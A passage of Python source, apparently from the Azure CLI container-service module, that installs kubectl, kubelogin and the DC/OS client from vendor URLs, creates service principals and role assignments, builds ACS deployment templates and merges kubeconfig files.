proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
if orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
raise CLIError(
'Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError(
'Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version,
kubelogin_install_location, kubelogin_base_src_url)
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
logger.warning('Downloading client to "%s" from "%s"',
install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
raise CLIError(
'Proxy server ({}) does not exist on the cluster.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"',
download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode |
stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False, aad_session_key
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal, aad_session_key
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate',
value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate',
value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(
cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(
default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(
default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict(
{"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(
_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
def _get_user_assigned_identity_resource_id_regular_expression():
return re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
_re_user_assigned_identity_resource_id = _get_user_assigned_identity_resource_id_regular_expression()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
raise ClientRequestError(ex.message)
return identity
raise InvalidArgumentValueError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).principal_id
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(
windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
DeploymentProperties = cmd.get_models(
'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(
template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
Deployment = cmd.get_models(
'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
validation_poller = smc.begin_validate(
resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return smc.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(
name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError(
'Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(
path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning(
'Failed to merge credentials to kube config file: %s', exc)
logger.warning(
'The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
